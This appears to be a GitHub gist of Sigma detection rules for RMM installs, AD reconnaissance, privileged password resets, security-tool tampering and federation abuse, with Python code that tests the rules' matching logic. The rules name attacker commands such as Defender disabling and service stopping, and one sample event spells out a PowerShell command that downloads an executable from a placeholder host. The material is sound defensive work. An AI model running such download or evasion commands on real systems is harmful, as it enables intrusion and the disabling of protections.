@pedramamini
Created October 9, 2024 16:13
#### Sigma Rule: Initial Access via Social Engineering and RMM Tool Installation
```yaml
title: Initial Access via Social Engineering and RMM Tool Installation
id: 1a2b3c4d-5e6f-7g8h-9i0j-1k2l3m4n5o6p   # placeholder, not a valid UUIDv4 (contains non-hex characters); replace before use
description: Detects the installation of Remote Monitoring and Management (RMM) utilities following social engineering, which may indicate initial access by threat actors. Covers msiexec installs straight from a URL and PowerShell-driven downloads.
status: experimental
author: Your Name
logsource:
    category: process_creation
    product: windows
detection:
    selection_msi:
        Image|endswith: '\msiexec.exe'
        # |all is required: a plain list under |contains is OR and would fire on every local MSI install
        CommandLine|contains|all:
            - '/i'
            - 'http'
    selection_ps:
        # Image, not ParentImage: CommandLine belongs to the process being created, so the
        # download string is only visible on the PowerShell process itself
        Image|endswith:
            - '\powershell.exe'
            - '\pwsh.exe'
        CommandLine|contains|all:
            - 'DownloadFile'
            - 'http'
    condition: 1 of selection_*
falsepositives:
    - Legitimate RMM tool installations by administrators
    - Software deployment scripts that install MSI packages from an internal web server
level: high
tags:
    - attack.initial_access
    - attack.t1566
    - attack.t1219
```
#### End of Sigma Rule
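The modifier semantics in the rule above decide whether it is useful or noisy: a list of values under one field is OR, `|all` makes it AND, and `|endswith` on `Image` is how the binary is pinned down. The following is an added example, not code from this gist or from the Sigma project: a minimal evaluator for just that subset of Sigma field modifiers, run over constructed `process_creation` events, showing the rule's first selection both as a plain `|contains` list and with `|contains|all`. The same matcher serves the other `process_creation` rules on this page (AD recon tools, defense evasion), which use the same modifiers. Field names follow Sigma's `process_creation` taxonomy; matching is case-insensitive, as Sigma backends treat Windows path and command-line fields; all events are made up.

```python
"""Minimal evaluator for the Sigma process_creation selections on this page.

Added example, not the gist's code and not pySigma. Implements only what
the rules above need: list-of-values = OR, `|all` = AND, `|endswith`,
`|contains`, `|startswith`, and a bare field = exact match. Comparisons are
case-insensitive. Sample events are constructed, not real telemetry.
"""

# Rule 1, selection1, in the two forms discussed above.
SEL1_AS_WRITTEN = {
    "Image|endswith": ["\\msiexec.exe"],
    "CommandLine|contains": ["/i", "http"],        # list => OR: fires on any MSI install
}
SEL1_ALL = {
    "Image|endswith": ["\\msiexec.exe"],
    "CommandLine|contains|all": ["/i", "http"],    # AND: install *and* a URL on the command line
}
SEL2 = {
    "Image|endswith": ["\\powershell.exe", "\\pwsh.exe"],
    "CommandLine|contains|all": ["DownloadFile", "http"],
}


def _match_one(value, op, needle):
    v, n = value.lower(), needle.lower()
    if op == "endswith":
        return v.endswith(n)
    if op == "contains":
        return n in v
    if op == "startswith":
        return v.startswith(n)
    return v == n  # no modifier: exact (case-insensitive) match


def match_selection(selection, event):
    """True if every field condition in `selection` holds for `event` (fields are ANDed)."""
    for key, values in selection.items():
        field, *mods = key.split("|")
        require_all = "all" in mods
        op = next((m for m in mods if m != "all"), "equals")
        value = str(event.get(field, ""))
        if not isinstance(values, list):
            values = [values]
        hits = [_match_one(value, op, str(n)) for n in values]
        if not (all(hits) if require_all else any(hits)):
            return False
    return True


def rule1_fires(event, strict=True):
    """condition: selection1 or selection2. strict=True uses the |all form of selection1."""
    sel1 = SEL1_ALL if strict else SEL1_AS_WRITTEN
    return match_selection(sel1, event) or match_selection(SEL2, event)


# Constructed sample events (hostnames are placeholders).
EVENTS = {
    "rmm_msi_from_url": {
        "Image": r"C:\Windows\System32\msiexec.exe",
        "CommandLine": r"msiexec.exe /i http://example.invalid/agent.msi /qn",
    },
    "local_msi_install": {
        "Image": r"C:\Windows\System32\msiexec.exe",
        "CommandLine": r"msiexec.exe /i C:\Users\jdoe\Downloads\7zip.msi /qn",
    },
    "ps_downloadfile": {
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell -nop -c (New-Object Net.WebClient).DownloadFile('http://example.invalid/a.exe','a.exe')",
    },
    "benign_notepad": {
        "Image": r"C:\Windows\System32\notepad.exe",
        "CommandLine": "notepad.exe",
    },
}

if __name__ == "__main__":
    for name, ev in EVENTS.items():
        print(f"{name:20s} as_written={rule1_fires(ev, strict=False)!s:5} with_all={rule1_fires(ev)}")
```

Running it shows the difference in one line: `local_msi_install` fires with the plain list (it contains `/i`) and is silent with `|all`, while the URL-based install and the PowerShell download fire in both forms.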
#### Sigma Rule: Enumeration and Discovery via AD Recon Tools
```yaml
title: Enumeration and Discovery via AD Recon Tools
id: 2b3c4d5e-6f7g-8h9i-0j1k-2l3m4n5o6p7q   # placeholder, not a valid UUIDv4; replace before use
description: Detects execution of Active Directory reconnaissance tools such as PingCastle and ADRecon, which may indicate enumeration and discovery by threat actors.
status: experimental
author: Your Name
logsource:
    category: process_creation
    product: windows
detection:
    selection_exe:
        Image|endswith: '\PingCastle.exe'
    selection_script:
        # ADRecon is a PowerShell script, so it never appears as Image;
        # it shows up in the command line of the PowerShell host that runs it
        Image|endswith:
            - '\powershell.exe'
            - '\pwsh.exe'
        CommandLine|contains: 'ADRecon.ps1'
    condition: 1 of selection_*
falsepositives:
    - Legitimate security assessments and audits
level: medium
tags:
    - attack.discovery
    - attack.t1087.002
```
#### End of Sigma Rule
#### Sigma Rule: Privilege Escalation via SIM Swap or Call Forwarding
```yaml
title: Privilege Escalation via SIM Swap or Call Forwarding for Password Reset
id: 3c4d5e6f-7g8h-9i0j-1k2l-3m4n5o6p7q8r   # placeholder, not a valid UUIDv4; replace before use
description: Detects password resets or changes on privileged accounts. A SIM swap or call-forwarding attack happens at the carrier and leaves no Windows event; what this rule sees is the help-desk reset the attacker talks their way into afterwards. Changes to MFA methods live in the identity provider's audit log and need a separate rule.
status: experimental
author: Your Name
logsource:
    product: windows
    service: security
detection:
    selection:
        EventID:
            - 4724   # An attempt was made to reset an account's password (reset by another principal, e.g. help desk)
            - 4723   # An attempt was made to change an account's password (the account holder supplied the old one)
        # endswith 'admin' also matches names such as 'sysadmin'; tighten to your naming convention
        TargetUserName|endswith:
            - 'admin'
            - 'administrator'
    condition: selection
falsepositives:
    - Legitimate password reset by administrators or help desk personnel
level: high
tags:
    - attack.privilege_escalation
    - attack.t1078
```
#### End of Sigma Rule
#### Sigma Rule: Defense Evasion by Disabling Security Products via Compromised Accounts
```yaml
title: Defense Evasion by Disabling Security Products via Compromised Accounts
id: 4d5e6f7g-8h9i-0j1k-2l3m-4n5o6p7q8r9s   # placeholder, not a valid UUIDv4; replace before use
description: Detects attempts to disable or impair security products from compromised accounts, which may indicate defense evasion by threat actors.
status: experimental
author: Your Name
logsource:
    category: process_creation
    product: windows
detection:
    selection_defender:
        Image|endswith:
            - '\powershell.exe'
            - '\pwsh.exe'
        # matching the bare parameter name also catches '-DisableRealtimeMonitoring 1' and
        # the ':$true' form, which the literal '-DisableRealtimeMonitoring $true' would miss
        CommandLine|contains|all:
            - 'Set-MpPreference'
            - 'DisableRealtimeMonitoring'
    selection_net_stop:
        # 'cmd /c net stop X' spawns net.exe, so matching net.exe/net1.exe covers the cmd.exe case too.
        # 'stop' alone is noisy: scope it to your security product's service names (e.g. WinDefend, Sense)
        Image|endswith:
            - '\net.exe'
            - '\net1.exe'
        CommandLine|contains: ' stop '
    condition: 1 of selection_*
falsepositives:
    - Legitimate security product configuration changes by administrators
    - Administrators stopping unrelated services with net stop
level: critical
tags:
    - attack.defense_evasion
    - attack.t1562.001
```
#### End of Sigma Rule
#### Sigma Rule: Persistence via Federated Identity Abuse and SAML Tokens
```yaml
title: Persistence via Federated Identity Abuse and SAML Tokens
id: 5e6f7g8h-9i0j-1k2l-3m4n-5o6p7q8r9s0t   # placeholder, not a valid UUIDv4; replace before use
description: Detects changes to domain federation settings in Entra ID (Azure AD), the step an attacker takes before minting SAML tokens with a signing certificate they control. The Windows Security log cannot see this; it is recorded in the tenant's audit log.
status: experimental
author: Your Name
logsource:
    product: azure
    service: auditlogs
detection:
    # The earlier draft keyed on Windows events 4741/4726 (which carry no federation data) and on
    # 4769 TicketOptions containing the words 'renewable' and 'forwardable'. TicketOptions is a hex
    # bitmask (typically 0x40810000, which already has both flags set), so a text match never fires
    # and a flag match would fire on nearly every service ticket request.
    selection:
        # verify the operation names against your tenant's audit log; Microsoft has renamed activities before
        properties.message:
            - 'Set federation settings on domain'
            - 'Set domain authentication'
    condition: selection
falsepositives:
    - Legitimate federation changes by administrators for business needs
level: high
tags:
    - attack.persistence
    - attack.t1484.002
```
#### End of Sigma Rule
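The `TicketOptions` field of Windows event 4769 is logged as a hex bitmask, not as words, which is why a `|contains` match on `'renewable'` or `'forwardable'` is a dead check. The following is an added example, not code from this gist: it decodes the mask using the bit positions from Microsoft's 4769 documentation (bit 0 is the most significant bit of the 32-bit value; bit 1 is Forwardable, bit 8 Renewable, bit 15 Name-canonicalize, bit 27 Renewable-ok), then runs both the text match and the intended flag match over constructed events. It shows that the text match never fires and that the flag match fires on the ordinary `0x40810000` value, so ticket option flags do not discriminate federation abuse from normal Kerberos traffic. Service names and values in the sample events are made up.

```python
"""Decode TicketOptions from Windows Security event 4769.

Added example, not from the gist. Bit numbering follows Microsoft's 4769
documentation: bit 0 is the MSB of the 32-bit value, so bit n is
1 << (31 - n). Sample events are constructed.
"""

KDC_OPTIONS = {  # bit position -> flag name, per the 4769 documentation
    1: "forwardable", 2: "forwarded", 3: "proxiable", 4: "proxy",
    5: "allow-postdate", 6: "postdated", 7: "invalid", 8: "renewable",
    9: "initial", 10: "pre-authent", 11: "opt-hardware-auth",
    12: "transited-policy-checked", 13: "ok-as-delegate",
    14: "request-anonymous", 15: "name-canonicalize",
    26: "disable-transited-check", 27: "renewable-ok",
    28: "enc-tkt-in-skey", 30: "renew", 31: "validate",
}


def decode_ticket_options(value):
    """Return the set of flag names set in a TicketOptions value ('0x40810000' or int)."""
    bits = int(value, 16) if isinstance(value, str) else int(value)
    return {name for pos, name in KDC_OPTIONS.items() if bits & (1 << (31 - pos))}


def text_contains_match(value, needles):
    """What `TicketOptions|contains|all: [renewable, forwardable]` actually evaluates."""
    v = str(value).lower()
    return all(n.lower() in v for n in needles)


def flags_match(value, needles):
    """The check the rule author meant: all named flags set in the bitmask."""
    return {n.lower() for n in needles} <= decode_ticket_options(value)


# Constructed 4769 events; TicketOptions is in the form Windows writes it.
SAMPLE_4769 = [
    {"ServiceName": "cifs/fileserver01", "TicketOptions": "0x40810000"},  # the usual value
    {"ServiceName": "http/app01", "TicketOptions": "0x40810010"},         # plus renewable-ok
    {"ServiceName": "ldap/dc01", "TicketOptions": "0x00810000"},          # renewable, not forwardable
]


def count_hits(events, needles=("renewable", "forwardable")):
    """How many events each form of the check would flag."""
    return {
        "text_match": sum(text_contains_match(e["TicketOptions"], needles) for e in events),
        "flag_match": sum(flags_match(e["TicketOptions"], needles) for e in events),
    }


if __name__ == "__main__":
    for e in SAMPLE_4769:
        print(e["TicketOptions"], sorted(decode_ticket_options(e["TicketOptions"])))
    print(count_hits(SAMPLE_4769))
```

The text form flags nothing; the flag form flags two of the three constructed events, including the ordinary one, which is the point: forwardable and renewable are set on routine service ticket requests and say nothing about federation.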